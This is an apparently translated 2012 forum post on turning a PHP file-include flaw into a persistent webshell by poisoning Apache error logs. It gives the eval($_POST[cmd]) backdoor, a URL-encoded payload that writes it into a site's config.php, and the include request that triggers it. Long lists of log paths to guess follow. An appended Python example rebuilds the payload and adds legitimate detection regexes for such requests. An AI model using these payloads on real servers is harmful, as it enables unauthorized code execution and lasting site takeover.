PHP include of Apache logs to write a webshell

Posted 2012-9-15 14:27:40
Since the method above is very impractical (in testing I found the logs are routinely tens of megabytes, which takes all the fun out of it), let's go a step further and write a real webshell we can actually use, which also beats the painfully slow approach above by a wide margin.
Take the same one-line trojan again:
<?eval($_POST[cmd]);?>
By now you can probably see where this is going, and it is a good approach. The remaining question is how to get it written. Use fopen to open /home/virtual/www.xxx.com/forum/config.php and write the one-liner <?eval($_POST[cmd]);?> (the server-side half of the trojan) into it. As a single PHP statement that reads:

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval(\$_POST[cmd]);?>");fclose($fp);?>   //writes the one-liner into config.php; the $ is escaped because PHP interpolates $_POST[cmd] inside a double-quoted string and would otherwise write an empty eval()

We submit this so that Apache records it in the error log; including the log then writes the shell. Remember that it must be URL-encoded or it will not work. Encoding every / as %2F is what keeps the whole payload a single path component, so that the 404 entry ("File does not exist: ...") carries the complete decoded code. Check the target's Apache before relying on that: with AllowEncodedSlashes Off (the default in Apache 2.x) a path containing %2F is rejected with a 404 before any "File does not exist" entry is written, and such an entry only records the path up to the first missing component, so a decoded / inside the code truncates it.
Converted, that is:
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%5C%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
We submit
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%5C%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
The error log now contains this line of code that writes the webshell.
Now include the log by requesting
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
That writes the webshell: config.php now contains the one-liner.
OK.
http://www.xxx.com/forum/config.php is now our webshell.
Connect to it with lanker's client and the host is yours.
PS: all of the above presumes the target is writable by the user the web server runs as; the test here used -rwxrwxrwx (777) permissions, which you can check through the directory listing given above. Everything above also assumes the log path is known.
Other log paths you can guess, or start from this list.
Traversal form:
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/error_log

Absolute form:
/var/log/httpd/access_log
/var/log/httpd/error_log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/error_log
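The poisoning request and the log entry it leaves, as an added example that is not part of the original post (written in Python rather than PHP so the encoding and the checks run offline). The host, document root, client address, timestamps and sample log lines are constructed; the only values taken from the post are the one-liner, the config.php target and the z.php?zizzy= include parameter. The second half is the defender's side of the same procedure: the tokens that make the technique work, a PHP open tag in a request line or an include parameter pointing at a log file, are what to alert on in access_log and error_log.

```python
"""Apache error-log poisoning through a PHP include: build the poisoning
request, show the log entry it leaves, and flag such requests in logs.

Added example, not code from the original post. Host, document root, client
address, timestamps and the sample log lines are constructed for
illustration; only the one-liner and the config.php target come from the
post.
"""
import re
from urllib.parse import quote, unquote

# The one-line shell the post writes into config.php. The '<?' form needs
# short_open_tag enabled on the target; '<?php' would not.
ONE_LINER = '<?eval($_POST[cmd]);?>'


def writer_payload(target_path):
    """PHP that, once the log is include()d, writes ONE_LINER to target_path.

    Inside a PHP double-quoted string "$_POST[cmd]" is interpolated, so the
    dollar sign is escaped (\\$) to make the literal text reach the file.
    """
    literal = ONE_LINER.replace("$", "\\$")
    return ('<?$fp=fopen("%s","w+");fputs($fp,"%s");fclose($fp);?>'
            % (target_path, literal))


def encode_for_request(php):
    """Percent-encode the payload for the request path, slashes included.

    Encoding '/' as %2F keeps the whole payload a single path component,
    which is what lets the 404 entry carry it in full; a decoded '/' would
    truncate the entry at the first missing component. Apache 2.x only
    decodes %2F when AllowEncodedSlashes is On (default Off: plain 404, no
    entry), so check that before relying on the error-log route.
    """
    return quote(php, safe="")


def simulated_error_log_line(docroot, encoded_component):
    """The 404 entry the poisoning request leaves when %2F is decoded.

    error_log records the decoded translated filename, so the PHP tags come
    back as characters, whereas access_log keeps the raw request line with
    them still percent-encoded. Line format modelled on Apache 2.2's default
    ErrorLog; timestamp and client address are constructed.
    """
    return ("[Sat Sep 15 14:27:40 2012] [error] [client 203.0.113.5] "
            "File does not exist: " + docroot + "/" + unquote(encoded_component))


# Detection side: a PHP open tag in a log line, raw or percent-encoded, or an
# include-style parameter that points at an access/error log.
PHP_TAG = re.compile(r"<\?(?:php\b|=|\s|[A-Za-z$])")
LOG_INCLUDE = re.compile(
    r"[?&][^ \"]*=(?:\.\./|/)[^ \"]*(?:access|error)[._]?log", re.I)


def poisoned_lines(log_text):
    """Return (reason, line) pairs for lines that look like poisoning steps."""
    hits = []
    for line in log_text.splitlines():
        if PHP_TAG.search(line) or PHP_TAG.search(unquote(line)):
            hits.append(("php-tag", line))
        elif LOG_INCLUDE.search(line):
            hits.append(("log-include", line))
    return hits


# Constructed sample: a benign request, an encoded poisoning request as
# access_log keeps it, the include request, and the error_log entry the
# poisoning request leaves once decoded.
SAMPLE_LOG = "\n".join([
    '203.0.113.5 - - [15/Sep/2012:14:27:40 +0800] "GET /forum/index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [15/Sep/2012:14:27:41 +0800] "GET /%3C%3Fphp%20system%28%24_GET%5Bc%5D%29%3B%3F%3E HTTP/1.1" 404 209',
    '203.0.113.5 - - [15/Sep/2012:14:27:42 +0800] "GET /z.php?zizzy=../../../var/log/httpd/error_log HTTP/1.1" 200 8801',
    '[Sat Sep 15 14:27:41 2012] [error] [client 203.0.113.5] File does not exist: /var/www/html/<?php system($_GET[c]);?>',
])


if __name__ == "__main__":
    target = "/home/virtual/www.xxx.com/forum/config.php"  # target from the post
    encoded = encode_for_request(writer_payload(target))
    print("GET /" + encoded + " HTTP/1.1")
    print(simulated_error_log_line("/home/virtual/www.xxx.com", encoded))
    for reason, line in poisoned_lines(SAMPLE_LOG):
        print(reason, "=>", line)
```

PHP_TAG deliberately also matches an XML declaration (`<?xml`), because PHP with short_open_tag enabled treats it as an open tag too; treat such hits as worth a look rather than noise. The detector decodes each line before matching so the percent-encoded form that access_log preserves is caught as well as the decoded form in error_log.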